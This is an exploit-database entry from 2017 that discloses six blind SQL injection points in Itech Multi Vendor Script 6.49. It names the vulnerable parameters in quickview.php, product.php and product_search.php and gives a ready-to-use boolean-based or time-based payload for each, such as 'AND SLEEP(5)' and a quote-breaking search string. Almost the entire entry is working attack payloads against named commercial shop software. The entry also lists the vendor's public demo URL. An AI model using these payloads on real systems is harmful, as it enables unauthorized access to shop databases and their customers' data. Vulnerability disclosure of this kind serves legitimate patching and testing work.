Itech Multi Vendor Script 6.49 - SQL Injection Vulnerability

2017-02-03T00:00:00
ID 1337DAY-ID-26892
Type zdt
Reporter Th3GundY
Modified 2017-02-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title :  Itech Multi Vendor Script - Multiple SQL Injections
# Author        :  Yunus YILDIRIM (Th3GundY)
# Team          :  CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website       :  http://www.yunus.ninja
# Contact       :  [email protected]
 
# Vendor Homepage : http://itechscripts.com/
# Software Link   : http://itechscripts.com/multi-vendor-shopping-script/
# Vuln. Version   : 6.49
# Demo            : http://multi-vendor.itechscripts.com
 
 
# # # #  DETAILS  # # # # 
 
SQL Injections :
 
# 1
http://localhost/quickview.php?id=10
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=10 AND 9776=9776
 
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=10 AND SLEEP(5)
 
# 2
http://localhost/product.php?id=9
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=9 AND 9693=9693
 
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=9 AND SLEEP(5)
 
# 3
http://localhost/product_search.php?search=Adidas
    Parameter: search (GET)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: search=Adidas%' AND SLEEP(5) AND '%'='
 
# 4
http://localhost/product_search.php?category_id=1
    Parameter: category_id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: category_id=1 AND 8225=8225
 
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: category_id=1 AND SLEEP(5)
 
# 5
http://localhost/product_search.php?category_id=1&sub_category_id=1&sub_sub_category_id=1
    Parameter: sub_sub_category_id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND 7485=7485
 
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND SLEEP(5)
 
# 6
http://localhost/product_search.php?category_id=1&sub_category_id=1
    Parameter: sub_category_id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: category_id=1&sub_category_id=1 AND 5242=5242
 
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: category_id=1&sub_category_id=1 AND SLEEP(5)

#  0day.today [2018-01-04]  #